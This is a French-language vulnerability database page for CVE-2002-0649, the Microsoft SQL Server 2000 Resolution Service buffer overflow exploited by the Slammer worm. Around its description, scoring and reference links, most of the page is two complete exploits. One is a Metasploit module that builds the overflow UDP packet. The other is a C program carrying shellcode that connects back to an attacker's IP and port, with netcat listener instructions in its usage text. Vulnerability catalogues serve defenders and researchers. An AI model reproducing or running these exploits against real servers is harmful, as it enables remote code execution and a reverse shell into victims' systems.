CVE-2002-0649 : Détail

CVE-2002-0649

Overflow
87.37%V4
Network
2002-07-26
02h00 +00:00
2018-10-19
12h57 +00:00
CVE.org
NVD
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Multiple buffer overflows in the Resolution Service for Microsoft SQL Server 2000 and Microsoft Desktop Engine 2000 (MSDE) allow remote attackers to cause a denial of service or execute arbitrary code via UDP packets to port 1434 in which (1) a 0x04 byte that causes the SQL Monitor thread to generate a long registry key name, or (2) a 0x08 byte with a long string causes heap corruption, as exploited by the Slammer/Sapphire worm.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer
The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
EPSS First.org

Informations sur l'Exploit

Exploit Database EDB-ID : 16393

Date de publication : 2010-04-29 22h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes

## # $Id: ms02_039_slammer.rb 9179 2010-04-30 08:40:19Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::MSSQL def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft SQL Server Resolution Overflow', 'Description' => %q{ This is an exploit for the SQL Server 2000 resolution service buffer overflow. This overflow is triggered by sending a udp packet to port 1434 which starts with 0x04 and is followed by long string terminating with a colon and a number. This module should work against any vulnerable SQL Server 2000 or MSDE install (pre-SP3). }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 9179 $', 'References' => [ [ 'CVE', '2002-0649'], [ 'OSVDB', '4578'], [ 'BID', '5310'], [ 'MSB', 'MS02-039'], ], 'Privileged' => true, 'Payload' => { 'Space' => 512, 'BadChars' => "\x00\x3a\x0a\x0d\x2f\x5c", 'StackAdjustment' => -3500, }, 'Targets' => [ [ 'MSSQL 2000 / MSDE <= SP2', { 'Platform' => 'win', 'Ret' => 0x42b48774, }, ], ], 'Platform' => 'win', 'DisclosureDate' => 'Jul 24 2002', 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(1434) ], self.class) end def check info = mssql_ping if (info['ServerName']) print_status("SQL Server Information:") info.each_pair { |k,v| print_status(" #{k + (" " * (15-k.length))} = #{v}") } return Exploit::CheckCode::Detected end return Exploit::CheckCode::Safe end def exploit connect_udp print_status(sprintf("Sending UDP packet with return address 0x%.8x", target.ret)) print_status("Execute 'net start sqlserveragent' once access is obtained"); # \x68:888 => push dword 0x3838383a buf = "\x04" + rand_text_english(800, payload_badchars) + "\x68:888" # Return to the stack pointer buf[ 97, 4] = [target.ret].pack('V') # Which lands right here buf[101, 6] = make_nops(6) # Jumps 8 bytes ahead buf[107, 2] = "\xeb\x08" # Write to thread storage space to avoid a crash buf[109, 8] = [0x7ffde0cc, 0x7ffde0cc].pack('VV') # And finally into the payload buf[117,payload.encoded.length] = payload.encoded udp_sock.put(buf) disconnect_udp handler end end
Exploit Database EDB-ID : 21652

Date de publication : 2002-07-24 22h00 +00:00
Auteur : David Litchfield
EDB Vérifié : Yes

source: https://www.securityfocus.com/bid/5310/info A vulnerability in Microsoft SQL Server 2000 could allow remote attackers to access target hosts. A problem in the SQL Server Resolution Service allows a remote attacker to execute arbitrary code on a vulnerable host. The attacker could exploit a heap-based buffer overflow in the resolution service by sending a maliciously crafted UDP packet to port 1434. ***UPDATE: A worm that may exploit this vulnerability has been detected in the wild. Administrators are advised to: - Block all external access to database servers until more information is available. - Deny access to TCP and UDP ports 1434 completely - Implement filter rules for other ports to decrease the chances of compromise through yet unknown avenues, even if the patch for this particular vulnerability has been installed. Cisco has released an advisory that details workaround information. Microsoft recommends that affected users apply SQL Server 2000 Service Pack 3. /* MSSQL2000 Remote UDP Exploit! Modified from "Advanced Windows Shellcode" by David Litchfield, david@ngssoftware.com fix a bug. Modified by lion, lion@cnhonker.net Welcome to HUC Website http://www.cnhonker.com */ #include <stdio.h> #include <winsock2.h> #pragma comment (lib,"Ws2_32") int GainControlOfSQL(void); int StartWinsock(void); struct sockaddr_in c_sa; struct sockaddr_in s_sa; struct hostent *he; SOCKET sock; unsigned long addr; int SQLUDPPort=1434; char host[256]=""; char request[4000]="\x04"; char ping[8]="\x02"; char exploit_code[]= "\x55\x8B\xEC\x68\x18\x10\xAE\x42\x68\x1C" "\x10\xAE\x42\xEB\x03\x5B\xEB\x05\xE8\xF8" "\xFF\xFF\xFF\xBE\xFF\xFF\xFF\xFF\x81\xF6" "\xAE\xFE\xFF\xFF\x03\xDE\x90\x90\x90\x90" "\x90\x33\xC9\xB1\x44\xB2\x58\x30\x13\x83" "\xEB\x01\xE2\xF9\x43\x53\x8B\x75\xFC\xFF" "\x16\x50\x33\xC0\xB0\x0C\x03\xD8\x53\xFF" "\x16\x50\x33\xC0\xB0\x10\x03\xD8\x53\x8B" "\x45\xF4\x50\x8B\x75\xF8\xFF\x16\x50\x33" "\xC0\xB0\x0C\x03\xD8\x53\x8B\x45\xF4\x50" "\xFF\x16\x50\x33\xC0\xB0\x08\x03\xD8\x53" "\x8B\x45\xF0\x50\xFF\x16\x50\x33\xC0\xB0" "\x10\x03\xD8\x53\x33\xC0\x33\xC9\x66\xB9" "\x04\x01\x50\xE2\xFD\x89\x45\xDC\x89\x45" "\xD8\xBF\x7F\x01\x01\x01\x89\x7D\xD4\x40" "\x40\x89\x45\xD0\x66\xB8\xFF\xFF\x66\x35" "\xFF\xCA\x66\x89\x45\xD2\x6A\x01\x6A\x02" "\x8B\x75\xEC\xFF\xD6\x89\x45\xEC\x6A\x10" "\x8D\x75\xD0\x56\x8B\x5D\xEC\x53\x8B\x45" "\xE8\xFF\xD0\x83\xC0\x44\x89\x85\x58\xFF" "\xFF\xFF\x83\xC0\x5E\x83\xC0\x5E\x89\x45" "\x84\x89\x5D\x90\x89\x5D\x94\x89\x5D\x98" "\x8D\xBD\x48\xFF\xFF\xFF\x57\x8D\xBD\x58" "\xFF\xFF\xFF\x57\x33\xC0\x50\x50\x50\x83" "\xC0\x01\x50\x83\xE8\x01\x50\x50\x8B\x5D" "\xE0\x53\x50\x8B\x45\xE4\xFF\xD0\x33\xC0" "\x50\xC6\x04\x24\x61\xC6\x44\x24\x01\x64" "\x68\x54\x68\x72\x65\x68\x45\x78\x69\x74" "\x54\x8B\x45\xF0\x50\x8B\x45\xF8\xFF\x10" "\xFF\xD0\x90\x2F\x2B\x6A\x07\x6B\x6A\x76" "\x3C\x34\x34\x58\x58\x33\x3D\x2A\x36\x3D" "\x34\x6B\x6A\x76\x3C\x34\x34\x58\x58\x58" "\x58\x0F\x0B\x19\x0B\x37\x3B\x33\x3D\x2C" "\x19\x58\x58\x3B\x37\x36\x36\x3D\x3B\x2C" "\x58\x1B\x2A\x3D\x39\x2C\x3D\x08\x2A\x37" "\x3B\x3D\x2B\x2B\x19\x58\x58\x3B\x35\x3C" "\x58"; int main(int argc, char *argv[]) { unsigned int ErrorLevel=0,len=0,c =0; int count = 0; char sc[300]=""; char ipaddress[40]=""; unsigned short port = 0; unsigned int ip = 0; char *ipt=""; char buffer[400]=""; unsigned short prt=0; char *prtt=""; if(argc != 2 && argc != 5) { printf("===============================================================\r\n"); printf("SQL Server UDP Buffer Overflow Remote Exploit\r\n\n"); printf("Modified from \"Advanced Windows Shellcode\"\r\n"); printf("Code by David Litchfield, david@ngssoftware.com\r\n"); printf("Modified by lion, fix a bug.\r\n"); printf("Welcome to HUC Website http://www.cnhonker.com\r\n\n"); printf("Usage:\r\n"); printf(" %s Target [<NCHost> <NCPort> <SQLSP>]\r\n\n", argv[0]); printf("Exemple:\r\n"); printf("Target is MSSQL SP 0:\r\n"); printf(" C:\\>nc -l -p 53\r\n"); printf(" C:\\>%s db.target.com 202.202.202.202 53 0\r\n",argv[0]); printf("Target is MSSQL SP 1 or 2:\r\n"); printf(" c:\\>%s db.target.com 202.202.202.202\r\n\n", argv[0]); return 0; } strncpy(host, argv[1], 100); if(argc == 5) { strncpy(ipaddress, argv[2], 36); port = atoi(argv[3]); // SQL Server 2000 Service pack level // The import entry for GetProcAddress in sqlsort.dll // is at 0x42ae1010 but on SP 1 and 2 is at 0x42ae101C // Need to set the last byte accordingly if(argv[4][0] == 0x30) { printf("MSSQL SP 0. GetProcAddress @0x42ae1010\r\n"); exploit_code[9]=0x10; } else { printf("MSSQL SP 1 or 2. GetProcAddress @0x42ae101C\r\n"); } } ErrorLevel = StartWinsock(); if(ErrorLevel==0) { printf("Starting Winsock Error.\r\n"); return 0; } if(argc == 2) { strcpy(request,ping); GainControlOfSQL(); return 0; } strcpy(buffer,exploit_code); // set this IP address to connect back to // this should be your address ip = inet_addr(ipaddress); ipt = (char*)&ip; buffer[142]=ipt[0]; buffer[143]=ipt[1]; buffer[144]=ipt[2]; buffer[145]=ipt[3]; // set the TCP port to connect on // netcat should be listening on this port // e.g. nc -l -p 80 prt = htons(port); prt = prt ^ 0xFFFF; prtt = (char *) &prt; buffer[160]=prtt[0]; buffer[161]=prtt[1]; strcat(request,"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXX"); // Overwrite the saved return address on the stack // This address contains a jmp esp instruction // and is in sqlsort.dll. strcat(request,"\xDC\xC9\xB0\x42"); // 0x42B0C9DC // Need to do a near jump strcat(request,"\xEB\x0E\x41\x42\x43\x44\x45\x46"); // Need to set an address which is writable or // sql server will crash before we can exploit // the overrun. Rather than choosing an address // on the stack which could be anywhere we'll // use an address in the .data segment of sqlsort.dll // as we're already using sqlsort for the saved // return address // SQL 2000 no service packs needs the address here strcat(request,"\x01\x70\xAE\x42"); // SQL 2000 Service Pack 2 needs the address here strcat(request,"\x01\x70\xAE\x42"); // just a few nops strcat(request,"\x90\x90\x90\x90\x90\x90\x90\x90"); // tack on exploit code to the end of our request and fire it off strcat(request,buffer); GainControlOfSQL(); return 0; } int StartWinsock() { int err=0; WORD wVersionRequested; WSADATA wsaData; wVersionRequested = MAKEWORD(2,1); err = WSAStartup( wVersionRequested, &wsaData ); if (err != 0) { printf("error WSAStartup 1.\r\n"); return 0; } if ( LOBYTE( wsaData.wVersion ) != 2 || HIBYTE( wsaData.wVersion ) != 1 ) { printf("error WSAStartup 2.\r\n"); WSACleanup( ); return 0; } if (isalpha(host[0])) { he = gethostbyname(host); if (he == NULL) { printf("Can't get the ip of %s!\r\n", host); WSACleanup( ); exit(-1); } s_sa.sin_addr.s_addr=INADDR_ANY; s_sa.sin_family=AF_INET; memcpy(&s_sa.sin_addr,he->h_addr,he->h_length); } else { s_sa.sin_family=AF_INET; s_sa.sin_addr.s_addr = inet_addr(host); } return 1; } int GainControlOfSQL(void) { char resp[600]=""; int snd=0,rcv=0,count=0, var=0; unsigned int ttlbytes=0; unsigned int to=2000; struct sockaddr_in cli_addr; SOCKET cli_sock; cli_sock=socket(AF_INET,SOCK_DGRAM,0); if (cli_sock==INVALID_SOCKET) { return printf("sock erron\r\n"); } cli_addr.sin_family=AF_INET; cli_addr.sin_addr.s_addr=INADDR_ANY; cli_addr.sin_port=htons((unsigned short)53); setsockopt(cli_sock,SOL_SOCKET,SO_RCVTIMEO,(char *)&to,sizeof(unsigned int)); if(bind(cli_sock,(LPSOCKADDR)&cli_addr,sizeof(cli_addr))==SOCKET_ERROR) { return printf("bind error"); } s_sa.sin_port=htons((unsigned short)SQLUDPPort); if (connect(cli_sock,(LPSOCKADDR)&s_sa,sizeof(s_sa))==SOCKET_ERROR) { return printf("Connect error"); } else { snd=send(cli_sock, request , strlen (request) , 0); printf("Packet sent!\r\n"); printf("If you don't have a shell it didn't work.\r\n"); rcv = recv(cli_sock,resp,596,0); if(rcv > 1) { while(count < rcv) { if(resp[count]==0x00) resp[count]=0x20; count++; } printf("%s",resp); } } closesocket(cli_sock); return 0; }

Products Mentioned

Configuraton 0

Microsoft>>Data_engine >> Version 2000

Microsoft>>Sql_server >> Version 2000

Microsoft>>Sql_server >> Version 2000

Microsoft>>Sql_server >> Version 2000

Références

http://www.cert.org/advisories/CA-2002-22.html
Tags : third-party-advisory, x_refsource_CERT
http://www.kb.cert.org/vuls/id/484891
Tags : third-party-advisory, x_refsource_CERT-VN
http://www.kb.cert.org/vuls/id/399260
Tags : third-party-advisory, x_refsource_CERT-VN
http://marc.info/?l=ntbugtraq&m=102760479902411&w=2
Tags : mailing-list, x_refsource_NTBUGTRAQ
http://secunia.com/advisories/7945
Tags : third-party-advisory, x_refsource_SECUNIA
http://marc.info/?l=bugtraq&m=102760196931518&w=2
Tags : mailing-list, x_refsource_BUGTRAQ
http://www.cert.org/advisories/CA-2003-04.html
Tags : third-party-advisory, x_refsource_CERT
http://www.securityfocus.com/bid/5310
Tags : vdb-entry, x_refsource_BID